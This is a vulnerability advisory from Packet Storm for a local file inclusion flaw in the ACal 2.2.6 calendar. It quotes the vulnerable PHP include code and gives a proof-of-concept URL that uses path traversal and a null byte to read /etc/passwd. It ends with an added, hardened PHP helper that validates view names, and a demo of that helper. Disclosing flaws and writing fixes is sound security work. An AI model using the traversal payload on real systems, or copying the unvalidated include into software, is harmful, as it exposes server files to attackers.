ACal 2.2.6 Local File Inclusion

2013-08-15T00:00:00
ID PACKETSTORM:122831
Type packetstorm
Reporter ICheer_No0M
Modified 2013-08-15T00:00:00

Description

`Exploit Title: ACal 2.2.6 Local File Inclusion Vulnerability  
Google Dork: -  
Date: 15/08/2013  
Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/  
Vendor Homepage: http://acalproj.sourceforge.net/  
Software Link: http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download  
Version: 2.2.6  
Tested on: Windows 7 + PHP 5.2.6  
  
  
---> Vuln Code : /embed/example/example.php  
  
// example.php, source line 12  
$path = "../../";  
...  
// example.php, source lines 25-30  
if (!isset($_GET['view'])) {  
    include $path . 'embed/' . $view . '.php'; // <-- LFI + null byte (if register_globals = On)  
}  
else {  
    include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + null byte  
}  
  
---> Exploit/Proof of Concept (PoC)  
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00  
  
`
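
A hardened form of the include shown under "Vuln Code", as an added example that is not part of the original advisory and not ACal's own code. The `resolve_view` helper, the `month` view name and the temporary demo directory are assumptions made up for the demonstration; the nullable return type needs PHP 7.1 or later.

```php
<?php
// Added example (not ACal code): validate the view name before include.

/**
 * Map a user-supplied view name to a .php file inside $embedDir.
 * Returns the resolved path, or null if the name is not acceptable.
 */
function resolve_view(string $embedDir, $view): ?string
{
    // Only a plain name is allowed: no slashes, dots, NUL bytes or arrays.
    if (!is_string($view) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $view)) {
        return null;
    }
    $base = realpath($embedDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks; the result must stay under $base.
    $file = realpath($base . DIRECTORY_SEPARATOR . $view . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo: a throwaway embed directory with one hypothetical view.
$embedDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'acal_demo_' . uniqid();
mkdir($embedDir);
file_put_contents($embedDir . DIRECTORY_SEPARATOR . 'month.php', "<?php // demo view\n");

// Constructed inputs: one valid name, the advisory's traversal value
// (with the %00 decoded to a NUL byte), and an array parameter.
$inputs = ['month', "../../etc/passwd\0", '../../etc/passwd', ['x'], 'missing'];
foreach ($inputs as $input) {
    $resolved = resolve_view($embedDir, $input);
    printf("%-28s => %s\n", json_encode($input), $resolved === null ? 'rejected' : 'accepted');
}

// In example.php the call would look like this (default name is an assumption):
//   $file = resolve_view($path . 'embed/', $_GET['view'] ?? 'month');
//   if ($file === null) { http_response_code(400); exit; }
//   include $file;

unlink($embedDir . DIRECTORY_SEPARATOR . 'month.php');
rmdir($embedDir);
```

Reading the name only from `$_GET` also removes the dependence on `register_globals` that the first branch of the original code has.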